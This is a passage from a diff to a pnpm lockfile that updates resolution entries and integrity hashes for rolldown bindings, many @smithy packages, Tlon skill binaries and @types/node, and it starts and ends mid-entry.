'@rolldown/binding-win32-arm64-msvc@1.0.0-rc.5': - resolution: {integrity: sha512-jUct1XVeGtyjqJXEAfvdFa8xoigYZ2rge7nYEm70ppQxpfH9ze2fbIrpHmP2tNM2vL/F6Dd0CpXhpjPbC6bSxQ==} + '@rolldown/binding-win32-arm64-msvc@1.0.0-rc.7': + resolution: {integrity: sha512-K6svNRljO6QrL6VTKxwh4yThhlR9DT/tK0XpaFQMnJwwQKng+NYcVEtUkAM0WsoiZHw+Hnh3DGnn3taf/pNYGg==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [arm64] os: [win32] - '@rolldown/binding-win32-x64-msvc@1.0.0-rc.5': - resolution: {integrity: sha512-VQ8F9ld5gw29epjnVGdrx8ugiLTe8BMqmhDYy7nGbdeDo4HAt4bgdZvLbViEhg7DZyHLpiEUlO5/jPSUrIuxRQ==} + '@rolldown/binding-win32-x64-msvc@1.0.0-rc.7': + resolution: {integrity: sha512-3ZJBT47VWLKVKIyvHhUSUgVwHzzZW761YAIkM3tOT+8ZTjFVp0acCM0Y2Z2j3jCl+XYi2d9y2uEWQ8H0PvvpPw==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [x64] os: [win32] - '@rolldown/pluginutils@1.0.0-rc.5': - resolution: {integrity: sha512-RxlLX/DPoarZ9PtxVrQgZhPoor987YtKQqCo5zkjX+0S0yLJ7Vv515Wk6+xtTL67VONKJKxETWZwuZjss2idYw==} + '@rolldown/pluginutils@1.0.0-rc.7': + resolution: {integrity: sha512-qujRfC8sFVInYSPPMLQByRh7zhwkGFS4+tyMQ83srV1qrxL4g8E2tyxVVyxd0+8QeBM1mIk9KbWxkegRr76XzA==} '@rollup/rollup-android-arm-eabi@4.59.0': resolution: {integrity: sha512-upnNBkA6ZH2VKGcBj9Fyl9IGNPULcjXRlg0LLeaioQWueH30p6IXtJEbKAgvyv+mJaMxSm1l6xwDXYjpEMiLMg==} @@ -2621,6 +2752,10 @@ packages: resolution: {integrity: sha512-qocxM/X4XGATqQtUkbE9SPUB6wekBi+FyJOMbPj0AhvyvFGYEmOlz6VB22iMePCQsFmMIvFSeViDvA7mZJG47g==} engines: {node: '>=18.0.0'} + '@smithy/abort-controller@4.2.11': + resolution: {integrity: sha512-Hj4WoYWMJnSpM6/kchsm4bUNTL9XiSyhvoMb2KIq4VJzyDt7JpGHUZHkVNPZVC7YE1tf8tPeVauxpFBKGW4/KQ==} + engines: {node: '>=18.0.0'} + '@smithy/chunked-blob-reader-native@4.2.2': resolution: {integrity: sha512-QzzYIlf4yg0w5TQaC9VId3B3ugSk1MI/wb7tgcHtd7CBV9gNRKZrhc2EPSxSZuDy10zUZ0lomNMgkc6/VVe8xg==} engines: {node: '>=18.0.0'} @@ -2629,6 +2764,10 @@ packages: resolution: {integrity: sha512-y5d4xRiD6TzeP5BWlb+Ig/VFqF+t9oANNhGeMqyzU7obw7FYgTgVi50i5JqBTeKp+TABeDIeeXFZdz65RipNtA==} engines: {node: '>=18.0.0'} + '@smithy/config-resolver@4.4.10': + resolution: {integrity: sha512-IRTkd6ps0ru+lTWnfnsbXzW80A8Od8p3pYiZnW98K2Hb20rqfsX7VTlfUwhrcOeSSy68Gn9WBofwPuw3e5CCsg==} + engines: {node: '>=18.0.0'} + '@smithy/config-resolver@4.4.9': resolution: {integrity: sha512-ejQvXqlcU30h7liR9fXtj7PIAau1t/sFbJpgWPfiYDs7zd16jpH0IsSXKcba2jF6ChTXvIjACs27kNMc5xxE2Q==} engines: {node: '>=18.0.0'} @@ -2637,10 +2776,18 @@ packages: resolution: {integrity: sha512-4xE+0L2NrsFKpEVFlFELkIHQddBvMbQ41LRIP74dGCXnY1zQ9DgksrBcRBDJT+iOzGy4VEJIeU3hkUK5mn06kg==} engines: {node: '>=18.0.0'} + '@smithy/core@3.23.9': + resolution: {integrity: sha512-1Vcut4LEL9HZsdpI0vFiRYIsaoPwZLjAxnVQDUMQK8beMS+EYPLDQCXtbzfxmM5GzSgjfe2Q9M7WaXwIMQllyQ==} + engines: {node: '>=18.0.0'} + '@smithy/credential-provider-imds@4.2.10': resolution: {integrity: sha512-3bsMLJJLTZGZqVGGeBVFfLzuRulVsGTj12BzRKODTHqUABpIr0jMN1vN3+u6r2OfyhAQ2pXaMZWX/swBK5I6PQ==} engines: {node: '>=18.0.0'} + '@smithy/credential-provider-imds@4.2.11': + resolution: {integrity: sha512-lBXrS6ku0kTj3xLmsJW0WwqWbGQ6ueooYyp/1L9lkyT0M02C+DWwYwc5aTyXFbRaK38ojALxNixg+LxKSHZc0g==} + engines: {node: '>=18.0.0'} + '@smithy/eventstream-codec@4.2.10': resolution: {integrity: sha512-A4ynrsFFfSXUHicfTcRehytppFBcY3HQxEGYiyGktPIOye3Ot7fxpiy4VR42WmtGI4Wfo6OXt/c1Ky1nUFxYYQ==} engines: {node: '>=18.0.0'} @@ -2665,6 +2812,10 @@ packages: resolution: {integrity: sha512-wbTRjOxdFuyEg0CpumjZO0hkUl+fetJFqxNROepuLIoijQh51aMBmzFLfoQdwRjxsuuS2jizzIUTjPWgd8pd7g==} engines: {node: '>=18.0.0'} + '@smithy/fetch-http-handler@5.3.13': + resolution: {integrity: sha512-U2Hcfl2s3XaYjikN9cT4mPu8ybDbImV3baXR0PkVlC0TTx808bRP3FaPGAzPtB8OByI+JqJ1kyS+7GEgae7+qQ==} + engines: {node: '>=18.0.0'} + '@smithy/hash-blob-browser@4.2.11': resolution: {integrity: sha512-DrcAx3PM6AEbWZxsKl6CWAGnVwiz28Wp1ZhNu+Hi4uI/6C1PIZBIaPM2VoqBDAsOWbM6ZVzOEQMxFLLdmb4eBQ==} engines: {node: '>=18.0.0'} @@ -2673,6 +2824,10 @@ packages: resolution: {integrity: sha512-1VzIOI5CcsvMDvP3iv1vG/RfLJVVVc67dCRyLSB2Hn9SWCZrDO3zvcIzj3BfEtqRW5kcMg5KAeVf1K3dR6nD3w==} engines: {node: '>=18.0.0'} + '@smithy/hash-node@4.2.11': + resolution: {integrity: sha512-T+p1pNynRkydpdL015ruIoyPSRw9e/SQOWmSAMmmprfswMrd5Ow5igOWNVlvyVFZlxXqGmyH3NQwfwy8r5Jx0A==} + engines: {node: '>=18.0.0'} + '@smithy/hash-stream-node@4.2.10': resolution: {integrity: sha512-w78xsYrOlwXKwN5tv1GnKIRbHb1HygSpeZMP6xDxCPGf1U/xDHjCpJu64c5T35UKyEPwa0bPeIcvU69VY3khUA==} engines: {node: '>=18.0.0'} @@ -2681,6 +2836,10 @@ packages: resolution: {integrity: sha512-vy9KPNSFUU0ajFYk0sDZIYiUlAWGEAhRfehIr5ZkdFrRFTAuXEPUd41USuqHU6vvLX4r6Q9X7MKBco5+Il0Org==} engines: {node: '>=18.0.0'} + '@smithy/invalid-dependency@4.2.11': + resolution: {integrity: sha512-cGNMrgykRmddrNhYy1yBdrp5GwIgEkniS7k9O1VLB38yxQtlvrxpZtUVvo6T4cKpeZsriukBuuxfJcdZQc/f/g==} + engines: {node: '>=18.0.0'} + '@smithy/is-array-buffer@2.2.0': resolution: {integrity: sha512-GGP3O9QFD24uGeAXYUjwSTXARoqpZykHadOmA8G5vfJPK0/DC67qa//0qvqrJzL1xc8WQWX7/yc7fwudjPHPhA==} engines: {node: '>=14.0.0'} @@ -2689,6 +2848,10 @@ packages: resolution: {integrity: sha512-Yfu664Qbf1B4IYIsYgKoABt010daZjkaCRvdU/sPnZG6TtHOB0md0RjNdLGzxe5UIdn9js4ftPICzmkRa9RJ4Q==} engines: {node: '>=18.0.0'} + '@smithy/is-array-buffer@4.2.2': + resolution: {integrity: sha512-n6rQ4N8Jj4YTQO3YFrlgZuwKodf4zUFs7EJIWH86pSCWBaAtAGBFfCM7Wx6D2bBJ2xqFNxGBSrUWswT3M0VJow==} + engines: {node: '>=18.0.0'} + '@smithy/md5-js@4.2.10': resolution: {integrity: sha512-Op+Dh6dPLWTjWITChFayDllIaCXRofOed8ecpggTC5fkh8yXes0vAEX7gRUfjGK+TlyxoCAA05gHbZW/zB9JwQ==} engines: {node: '>=18.0.0'} @@ -2697,62 +2860,122 @@ packages: resolution: {integrity: sha512-TQZ9kX5c6XbjhaEBpvhSvMEZ0klBs1CFtOdPFwATZSbC9UeQfKHPLPN9Y+I6wZGMOavlYTOlHEPDrt42PMSH9w==} engines: {node: '>=18.0.0'} + '@smithy/middleware-content-length@4.2.11': + resolution: {integrity: sha512-UvIfKYAKhCzr4p6jFevPlKhQwyQwlJ6IeKLDhmV1PlYfcW3RL4ROjNEDtSik4NYMi9kDkH7eSwyTP3vNJ/u/Dw==} + engines: {node: '>=18.0.0'} + '@smithy/middleware-endpoint@4.4.20': resolution: {integrity: sha512-9W6Np4ceBP3XCYAGLoMCmn8t2RRVzuD1ndWPLBbv7H9CrwM9Bprf6Up6BM9ZA/3alodg0b7Kf6ftBK9R1N04vw==} engines: {node: '>=18.0.0'} + '@smithy/middleware-endpoint@4.4.23': + resolution: {integrity: sha512-UEFIejZy54T1EJn2aWJ45voB7RP2T+IRzUqocIdM6GFFa5ClZncakYJfcYnoXt3UsQrZZ9ZRauGm77l9UCbBLw==} + engines: {node: '>=18.0.0'} + '@smithy/middleware-retry@4.4.37': resolution: {integrity: sha512-/1psZZllBBSQ7+qo5+hhLz7AEPGLx3Z0+e3ramMBEuPK2PfvLK4SrncDB9VegX5mBn+oP/UTDrM6IHrFjvX1ZA==} engines: {node: '>=18.0.0'} + '@smithy/middleware-retry@4.4.40': + resolution: {integrity: sha512-YhEMakG1Ae57FajERdHNZ4ShOPIY7DsgV+ZoAxo/5BT0KIe+f6DDU2rtIymNNFIj22NJfeeI6LWIifrwM0f+rA==} + engines: {node: '>=18.0.0'} + '@smithy/middleware-serde@4.2.11': resolution: {integrity: sha512-STQdONGPwbbC7cusL60s7vOa6He6A9w2jWhoapL0mgVjmR19pr26slV+yoSP76SIssMTX/95e5nOZ6UQv6jolg==} engines: {node: '>=18.0.0'} + '@smithy/middleware-serde@4.2.12': + resolution: {integrity: sha512-W9g1bOLui7Xn5FABRVS0o3rXL0gfN37d/8I/W7i0N7oxjx9QecUmXEMSUMADTODwdtka9cN43t5BI2CodLJpng==} + engines: {node: '>=18.0.0'} + '@smithy/middleware-stack@4.2.10': resolution: {integrity: sha512-pmts/WovNcE/tlyHa8z/groPeOtqtEpp61q3W0nW1nDJuMq/x+hWa/OVQBtgU0tBqupeXq0VBOLA4UZwE8I0YA==} engines: {node: '>=18.0.0'} + '@smithy/middleware-stack@4.2.11': + resolution: {integrity: sha512-s+eenEPW6RgliDk2IhjD2hWOxIx1NKrOHxEwNUaUXxYBxIyCcDfNULZ2Mu15E3kwcJWBedTET/kEASPV1A1Akg==} + engines: {node: '>=18.0.0'} + '@smithy/node-config-provider@4.3.10': resolution: {integrity: sha512-UALRbJtVX34AdP2VECKVlnNgidLHA2A7YgcJzwSBg1hzmnO/bZBHl/LDQQyYifzUwp1UOODnl9JJ3KNawpUJ9w==} engines: {node: '>=18.0.0'} + '@smithy/node-config-provider@4.3.11': + resolution: {integrity: sha512-xD17eE7kaLgBBGf5CZQ58hh2YmwK1Z0O8YhffwB/De2jsL0U3JklmhVYJ9Uf37OtUDLF2gsW40Xwwag9U869Gg==} + engines: {node: '>=18.0.0'} + '@smithy/node-http-handler@4.4.12': resolution: {integrity: sha512-zo1+WKJkR9x7ZtMeMDAAsq2PufwiLDmkhcjpWPRRkmeIuOm6nq1qjFICSZbnjBvD09ei8KMo26BWxsu2BUU+5w==} engines: {node: '>=18.0.0'} + '@smithy/node-http-handler@4.4.14': + resolution: {integrity: sha512-DamSqaU8nuk0xTJDrYnRzZndHwwRnyj/n/+RqGGCcBKB4qrQem0mSDiWdupaNWdwxzyMU91qxDmHOCazfhtO3A==} + engines: {node: '>=18.0.0'} + '@smithy/property-provider@4.2.10': resolution: {integrity: sha512-5jm60P0CU7tom0eNrZ7YrkgBaoLFXzmqB0wVS+4uK8PPGmosSrLNf6rRd50UBvukztawZ7zyA8TxlrKpF5z9jw==} engines: {node: '>=18.0.0'} + '@smithy/property-provider@4.2.11': + resolution: {integrity: sha512-14T1V64o6/ndyrnl1ze1ZhyLzIeYNN47oF/QU6P5m82AEtyOkMJTb0gO1dPubYjyyKuPD6OSVMPDKe+zioOnCg==} + engines: {node: '>=18.0.0'} + '@smithy/protocol-http@5.3.10': resolution: {integrity: sha512-2NzVWpYY0tRdfeCJLsgrR89KE3NTWT2wGulhNUxYlRmtRmPwLQwKzhrfVaiNlA9ZpJvbW7cjTVChYKgnkqXj1A==} engines: {node: '>=18.0.0'} + '@smithy/protocol-http@5.3.11': + resolution: {integrity: sha512-hI+barOVDJBkNt4y0L2mu3Ugc0w7+BpJ2CZuLwXtSltGAAwCb3IvnalGlbDV/UCS6a9ZuT3+exd1WxNdLb5IlQ==} + engines: {node: '>=18.0.0'} + '@smithy/querystring-builder@4.2.10': resolution: {integrity: sha512-HeN7kEvuzO2DmAzLukE9UryiUvejD3tMp9a1D1NJETerIfKobBUCLfviP6QEk500166eD2IATaXM59qgUI+YDA==} engines: {node: '>=18.0.0'} + '@smithy/querystring-builder@4.2.11': + resolution: {integrity: sha512-7spdikrYiljpket6u0up2Ck2mxhy7dZ0+TDd+S53Dg2DHd6wg+YNJrTCHiLdgZmEXZKI7LJZcwL3721ZRDFiqA==} + engines: {node: '>=18.0.0'} + '@smithy/querystring-parser@4.2.10': resolution: {integrity: sha512-4Mh18J26+ao1oX5wXJfWlTT+Q1OpDR8ssiC9PDOuEgVBGloqg18Fw7h5Ct8DyT9NBYwJgtJ2nLjKKFU6RP1G1Q==} engines: {node: '>=18.0.0'} + '@smithy/querystring-parser@4.2.11': + resolution: {integrity: sha512-nE3IRNjDltvGcoThD2abTozI1dkSy8aX+a2N1Rs55en5UsdyyIXgGEmevUL3okZFoJC77JgRGe99xYohhsjivQ==} + engines: {node: '>=18.0.0'} + '@smithy/service-error-classification@4.2.10': resolution: {integrity: sha512-0R/+/Il5y8nB/By90o8hy/bWVYptbIfvoTYad0igYQO5RefhNCDmNzqxaMx7K1t/QWo0d6UynqpqN5cCQt1MCg==} engines: {node: '>=18.0.0'} + '@smithy/service-error-classification@4.2.11': + resolution: {integrity: sha512-HkMFJZJUhzU3HvND1+Yw/kYWXp4RPDLBWLcK1n+Vqw8xn4y2YiBhdww8IxhkQjP/QlZun5bwm3vcHc8AqIU3zw==} + engines: {node: '>=18.0.0'} + '@smithy/shared-ini-file-loader@4.4.5': resolution: {integrity: sha512-pHgASxl50rrtOztgQCPmOXFjRW+mCd7ALr/3uXNzRrRoGV5G2+78GOsQ3HlQuBVHCh9o6xqMNvlIKZjWn4Euug==} engines: {node: '>=18.0.0'} + '@smithy/shared-ini-file-loader@4.4.6': + resolution: {integrity: sha512-IB/M5I8G0EeXZTHsAxpx51tMQ5R719F3aq+fjEB6VtNcCHDc0ajFDIGDZw+FW9GxtEkgTduiPpjveJdA/CX7sw==} + engines: {node: '>=18.0.0'} + '@smithy/signature-v4@5.3.10': resolution: {integrity: sha512-Wab3wW8468WqTKIxI+aZe3JYO52/RYT/8sDOdzkUhjnLakLe9qoQqIcfih/qxcF4qWEFoWBszY0mj5uxffaVXA==} engines: {node: '>=18.0.0'} + '@smithy/signature-v4@5.3.11': + resolution: {integrity: sha512-V1L6N9aKOBAN4wEHLyqjLBnAz13mtILU0SeDrjOaIZEeN6IFa6DxwRt1NNpOdmSpQUfkBj0qeD3m6P77uzMhgQ==} + engines: {node: '>=18.0.0'} + '@smithy/smithy-client@4.12.0': resolution: {integrity: sha512-R8bQ9K3lCcXyZmBnQqUZJF4ChZmtWT5NLi6x5kgWx5D+/j0KorXcA0YcFg/X5TOgnTCy1tbKc6z2g2y4amFupQ==} engines: {node: '>=18.0.0'} + '@smithy/smithy-client@4.12.3': + resolution: {integrity: sha512-7k4UxjSpHmPN2AxVhvIazRSzFQjWnud3sOsXcFStzagww17j1cFQYqTSiQ8xuYK3vKLR1Ni8FzuT3VlKr3xCNw==} + engines: {node: '>=18.0.0'} + '@smithy/types@4.13.0': resolution: {integrity: sha512-COuLsZILbbQsdrwKQpkkpyep7lCsByxwj7m0Mg5v66/ZTyenlfBc40/QFQ5chO0YN/PNEH1Bi3fGtfXPnYNeDw==} engines: {node: '>=18.0.0'} @@ -2761,18 +2984,34 @@ packages: resolution: {integrity: sha512-uypjF7fCDsRk26u3qHmFI/ePL7bxxB9vKkE+2WKEciHhz+4QtbzWiHRVNRJwU3cKhrYDYQE3b0MRFtqfLYdA4A==} engines: {node: '>=18.0.0'} + '@smithy/url-parser@4.2.11': + resolution: {integrity: sha512-oTAGGHo8ZYc5VZsBREzuf5lf2pAurJQsccMusVZ85wDkX66ojEc/XauiGjzCj50A61ObFTPe6d7Pyt6UBYaing==} + engines: {node: '>=18.0.0'} + '@smithy/util-base64@4.3.1': resolution: {integrity: sha512-BKGuawX4Doq/bI/uEmg+Zyc36rJKWuin3py89PquXBIBqmbnJwBBsmKhdHfNEp0+A4TDgLmT/3MSKZ1SxHcR6w==} engines: {node: '>=18.0.0'} + '@smithy/util-base64@4.3.2': + resolution: {integrity: sha512-XRH6b0H/5A3SgblmMa5ErXQ2XKhfbQB+Fm/oyLZ2O2kCUrwgg55bU0RekmzAhuwOjA9qdN5VU2BprOvGGUkOOQ==} + engines: {node: '>=18.0.0'} + '@smithy/util-body-length-browser@4.2.1': resolution: {integrity: sha512-SiJeLiozrAoCrgDBUgsVbmqHmMgg/2bA15AzcbcW+zan7SuyAVHN4xTSbq0GlebAIwlcaX32xacnrG488/J/6g==} engines: {node: '>=18.0.0'} + '@smithy/util-body-length-browser@4.2.2': + resolution: {integrity: sha512-JKCrLNOup3OOgmzeaKQwi4ZCTWlYR5H4Gm1r2uTMVBXoemo1UEghk5vtMi1xSu2ymgKVGW631e2fp9/R610ZjQ==} + engines: {node: '>=18.0.0'} + '@smithy/util-body-length-node@4.2.2': resolution: {integrity: sha512-4rHqBvxtJEBvsZcFQSPQqXP2b/yy/YlB66KlcEgcH2WNoOKCKB03DSLzXmOsXjbl8dJ4OEYTn31knhdznwk7zw==} engines: {node: '>=18.0.0'} + '@smithy/util-body-length-node@4.2.3': + resolution: {integrity: sha512-ZkJGvqBzMHVHE7r/hcuCxlTY8pQr1kMtdsVPs7ex4mMU+EAbcXppfo5NmyxMYi2XU49eqaz56j2gsk4dHHPG/g==} + engines: {node: '>=18.0.0'} + '@smithy/util-buffer-from@2.2.0': resolution: {integrity: sha512-IJdWBbTcMQ6DA0gdNhh/BwrLkDR+ADW5Kr1aZmd4k3DIF6ezMV4R2NIAmT08wQJ3yUK82thHWmC/TnK/wpMMIA==} engines: {node: '>=14.0.0'} @@ -2781,42 +3020,82 @@ packages: resolution: {integrity: sha512-/swhmt1qTiVkaejlmMPPDgZhEaWb/HWMGRBheaxwuVkusp/z+ErJyQxO6kaXumOciZSWlmq6Z5mNylCd33X7Ig==} engines: {node: '>=18.0.0'} + '@smithy/util-buffer-from@4.2.2': + resolution: {integrity: sha512-FDXD7cvUoFWwN6vtQfEta540Y/YBe5JneK3SoZg9bThSoOAC/eGeYEua6RkBgKjGa/sz6Y+DuBZj3+YEY21y4Q==} + engines: {node: '>=18.0.0'} + '@smithy/util-config-provider@4.2.1': resolution: {integrity: sha512-462id/00U8JWFw6qBuTSWfN5TxOHvDu4WliI97qOIOnuC/g+NDAknTU8eoGXEPlLkRVgWEr03jJBLV4o2FL8+A==} engines: {node: '>=18.0.0'} + '@smithy/util-config-provider@4.2.2': + resolution: {integrity: sha512-dWU03V3XUprJwaUIFVv4iOnS1FC9HnMHDfUrlNDSh4315v0cWyaIErP8KiqGVbf5z+JupoVpNM7ZB3jFiTejvQ==} + engines: {node: '>=18.0.0'} + '@smithy/util-defaults-mode-browser@4.3.36': resolution: {integrity: sha512-R0smq7EHQXRVMxkAxtH5akJ/FvgAmNF6bUy/GwY/N20T4GrwjT633NFm0VuRpC+8Bbv8R9A0DoJ9OiZL/M3xew==} engines: {node: '>=18.0.0'} + '@smithy/util-defaults-mode-browser@4.3.39': + resolution: {integrity: sha512-ui7/Ho/+VHqS7Km2wBw4/Ab4RktoiSshgcgpJzC4keFPs6tLJS4IQwbeahxQS3E/w98uq6E1mirCH/id9xIXeQ==} + engines: {node: '>=18.0.0'} + '@smithy/util-defaults-mode-node@4.2.39': resolution: {integrity: sha512-otWuoDm35btJV1L8MyHrPl462B07QCdMTktKc7/yM+Psv6KbED/ziXiHnmr7yPHUjfIwE9S8Max0LO24Mo3ZVg==} engines: {node: '>=18.0.0'} + '@smithy/util-defaults-mode-node@4.2.42': + resolution: {integrity: sha512-QDA84CWNe8Akpj15ofLO+1N3Rfg8qa2K5uX0y6HnOp4AnRYRgWrKx/xzbYNbVF9ZsyJUYOfcoaN3y93wA/QJ2A==} + engines: {node: '>=18.0.0'} + '@smithy/util-endpoints@3.3.1': resolution: {integrity: sha512-xyctc4klmjmieQiF9I1wssBWleRV0RhJ2DpO8+8yzi2LO1Z+4IWOZNGZGNj4+hq9kdo+nyfrRLmQTzc16Op2Vg==} engines: {node: '>=18.0.0'} + '@smithy/util-endpoints@3.3.2': + resolution: {integrity: sha512-+4HFLpE5u29AbFlTdlKIT7jfOzZ8PDYZKTb3e+AgLz986OYwqTourQ5H+jg79/66DB69Un1+qKecLnkZdAsYcA==} + engines: {node: '>=18.0.0'} + '@smithy/util-hex-encoding@4.2.1': resolution: {integrity: sha512-c1hHtkgAWmE35/50gmdKajgGAKV3ePJ7t6UtEmpfCWJmQE9BQAQPz0URUVI89eSkcDqCtzqllxzG28IQoZPvwA==} engines: {node: '>=18.0.0'} + '@smithy/util-hex-encoding@4.2.2': + resolution: {integrity: sha512-Qcz3W5vuHK4sLQdyT93k/rfrUwdJ8/HZ+nMUOyGdpeGA1Wxt65zYwi3oEl9kOM+RswvYq90fzkNDahPS8K0OIg==} + engines: {node: '>=18.0.0'} + '@smithy/util-middleware@4.2.10': resolution: {integrity: sha512-LxaQIWLp4y0r72eA8mwPNQ9va4h5KeLM0I3M/HV9klmFaY2kN766wf5vsTzmaOpNNb7GgXAd9a25P3h8T49PSA==} engines: {node: '>=18.0.0'} + '@smithy/util-middleware@4.2.11': + resolution: {integrity: sha512-r3dtF9F+TpSZUxpOVVtPfk09Rlo4lT6ORBqEvX3IBT6SkQAdDSVKR5GcfmZbtl7WKhKnmb3wbDTQ6ibR2XHClw==} + engines: {node: '>=18.0.0'} + '@smithy/util-retry@4.2.10': resolution: {integrity: sha512-HrBzistfpyE5uqTwiyLsFHscgnwB0kgv8vySp7q5kZ0Eltn/tjosaSGGDj/jJ9ys7pWzIP/icE2d+7vMKXLv7A==} engines: {node: '>=18.0.0'} + '@smithy/util-retry@4.2.11': + resolution: {integrity: sha512-XSZULmL5x6aCTTii59wJqKsY1l3eMIAomRAccW7Tzh9r8s7T/7rdo03oektuH5jeYRlJMPcNP92EuRDvk9aXbw==} + engines: {node: '>=18.0.0'} + '@smithy/util-stream@4.5.15': resolution: {integrity: sha512-OlOKnaqnkU9X+6wEkd7mN+WB7orPbCVDauXOj22Q7VtiTkvy7ZdSsOg4QiNAZMgI4OkvNf+/VLUC3VXkxuWJZw==} engines: {node: '>=18.0.0'} + '@smithy/util-stream@4.5.17': + resolution: {integrity: sha512-793BYZ4h2JAQkNHcEnyFxDTcZbm9bVybD0UV/LEWmZ5bkTms7JqjfrLMi2Qy0E5WFcCzLwCAPgcvcvxoeALbAQ==} + engines: {node: '>=18.0.0'} + '@smithy/util-uri-escape@4.2.1': resolution: {integrity: sha512-YmiUDn2eo2IOiWYYvGQkgX5ZkBSiTQu4FlDo5jNPpAxng2t6Sjb6WutnZV9l6VR4eJul1ABmCrnWBC9hKHQa6Q==} engines: {node: '>=18.0.0'} + '@smithy/util-uri-escape@4.2.2': + resolution: {integrity: sha512-2kAStBlvq+lTXHyAZYfJRb/DfS3rsinLiwb+69SstC9Vb0s9vNWkRwpnj918Pfi85mzi42sOqdV72OLxWAISnw==} + engines: {node: '>=18.0.0'} + '@smithy/util-utf8@2.3.0': resolution: {integrity: sha512-R8Rdn8Hy72KKcebgLiv8jQcQkXoLMOGGv5uI1/k0l+snqkOzQ1R0ChUBCxWMlBsFMekWjq0wRudIweFs7sKT5A==} engines: {node: '>=14.0.0'} @@ -2825,6 +3104,10 @@ packages: resolution: {integrity: sha512-DSIwNaWtmzrNQHv8g7DBGR9mulSit65KSj5ymGEIAknmIN8IpbZefEep10LaMG/P/xquwbmJ1h9ectz8z6mV6g==} engines: {node: '>=18.0.0'} + '@smithy/util-utf8@4.2.2': + resolution: {integrity: sha512-75MeYpjdWRe8M5E3AW0O4Cx3UadweS+cwdXjwYGBW5h/gxxnbeZ877sLPX/ZJA9GVTlL/qG0dXP29JWFCD1Ayw==} + engines: {node: '>=18.0.0'} + '@smithy/util-waiter@4.2.10': resolution: {integrity: sha512-4eTWph/Lkg1wZEDAyObwme0kmhEb7J/JjibY2znJdrYRgKbKqB7YoEhhJVJ4R1g/SYih4zuwX7LpJaM8RsnTVg==} engines: {node: '>=18.0.0'} @@ -2833,6 +3116,10 @@ packages: resolution: {integrity: sha512-dSfDCeihDmZlV2oyr0yWPTUfh07suS+R5OB+FZGiv/hHyK3hrFBW5rR1UYjfa57vBsrP9lciFkRPzebaV1Qujw==} engines: {node: '>=18.0.0'} + '@smithy/uuid@1.1.2': + resolution: {integrity: sha512-O/IEdcCUKkubz60tFbGA7ceITTAJsty+lBjNoorP4Z6XRqaFb/OjQjZODophEcuq68nKm6/0r+6/lLQ+XVpk8g==} + engines: {node: '>=18.0.0'} + '@snazzah/davey-android-arm-eabi@0.1.9': resolution: {integrity: sha512-Dq0WyeVGBw+uQbisV/6PeCQV2ndJozfhZqiNIfQxu6ehIdXB7iHILv+oY+AQN2n+qxiFmLh/MOX9RF+pIWdPbA==} engines: {node: '>= 10'} @@ -2938,36 +3225,36 @@ packages: resolution: {integrity: sha512-5Kc5CM2Ysn3vTTArBs2vESUt0AQiWZA86yc1TI3B+lxXmtEq133C1nxXNOgnzhrivdPZIh3zLj5gDnZjoLL5GA==} engines: {node: '>=12.17.0'} - '@tloncorp/api@git+https://github.com/tloncorp/api-beta.git#7eede1c1a756977b09f96aa14a92e2b06318ae87': - resolution: {commit: 7eede1c1a756977b09f96aa14a92e2b06318ae87, repo: https://github.com/tloncorp/api-beta.git, type: git} + '@tloncorp/api@https://codeload.github.com/tloncorp/api-beta/tar.gz/7eede1c1a756977b09f96aa14a92e2b06318ae87': + resolution: {tarball: https://codeload.github.com/tloncorp/api-beta/tar.gz/7eede1c1a756977b09f96aa14a92e2b06318ae87} version: 0.0.2 - '@tloncorp/tlon-skill-darwin-arm64@0.1.9': - resolution: {integrity: sha512-qhsblq0zx6Ugsf7++IGY+ai3uQYAS4XsFLCnQqxbenzPcnWLnDFvzpn+cBVMmXYJXxmOIUjI9Vk929vUkPQbTw==} + '@tloncorp/tlon-skill-darwin-arm64@0.2.2': + resolution: {integrity: sha512-R6RPBZKwOlhJm8BkPCbnhLJ9XKPCCp0a3nq1QUCT2bN4orp/IbKFaqGK2mjZsxzKT8aPPPnRqviqpGioDdItuA==} cpu: [arm64] os: [darwin] hasBin: true - '@tloncorp/tlon-skill-darwin-x64@0.1.9': - resolution: {integrity: sha512-tmEZv1fx86Rt7Y9OpTG+zTpHisjHcI7c6D0+p9kellPE9fa6qGG2lC4lcYNMsPXSjzmzznJNWcd0ltQW4/NHEQ==} + '@tloncorp/tlon-skill-darwin-x64@0.2.2': + resolution: {integrity: sha512-KdhoF/V4sBty4vKXMljpjSp8YBUyFSOTkxlxoe4qqK3NiNSEADp5VwGEv+2BkmaG68xtfoSnOKoQIDog17S0Fw==} cpu: [x64] os: [darwin] hasBin: true - '@tloncorp/tlon-skill-linux-arm64@0.1.9': - resolution: {integrity: sha512-+EXkUmlcMTY1DkAkQTE+eRHAyrWunAgOthaTVG4zYU9B4eyXC3MstMId6EaAXkv89HZ3vMqAAW4CCDxpxIzg5Q==} + '@tloncorp/tlon-skill-linux-arm64@0.2.2': + resolution: {integrity: sha512-h1ih72PCEWZUuJx0ugmJgB934wzhKqSd0Qa1/UGgCJJoIr7JPxZEIBoM4QJ8mBo+8nBbYWb1tCacL20lSGgKjw==} cpu: [arm64] os: [linux] hasBin: true - '@tloncorp/tlon-skill-linux-x64@0.1.9': - resolution: {integrity: sha512-x09fR3H2kSCfzTsB2e2ajRLlN8ANSeTHvyXEy+emHhohlLHMacSoHLgYccR4oK7TrE8iCexYZYLGypXSk8FmZQ==} + '@tloncorp/tlon-skill-linux-x64@0.2.2': + resolution: {integrity: sha512-kV295YRWiAxMX15zaLv9sdDp/4lKZl7zxKNln3pCaLYKOCDsbL/7fc8xgzaLIvumWsv8Hs8ShzmxSDjlXpS8Nw==} cpu: [x64] os: [linux] hasBin: true - '@tloncorp/tlon-skill@0.1.9': - resolution: {integrity: sha512-uBLh2GLX8X9Dbyv84FakNbZwsrA4vEBBGzSXwevQtO/7ttbHU18zQsQKv9NFTWrTJtQ8yUkZjb5F4bmYHuXRIw==} + '@tloncorp/tlon-skill@0.2.2': + resolution: {integrity: sha512-2rxi9HdnwMGMTrqstDDwLDk9jB8vWGaVSL8Nh/kT8DTq3F6FA+6TiNmNMWBEWPdnPGLpGpf4ywoxq9/9vobv+w==} hasBin: true '@tokenizer/inflate@0.4.1': @@ -3089,8 +3376,8 @@ packages: '@types/node@24.11.0': resolution: {integrity: sha512-fPxQqz4VTgPI/IQ+lj9r0h+fDR66bzoeMGHp8ASee+32OSGIkeASsoZuJixsQoVef1QJbeubcPBxKk22QVoWdw==} - '@types/node@25.3.3': - resolution: {integrity: 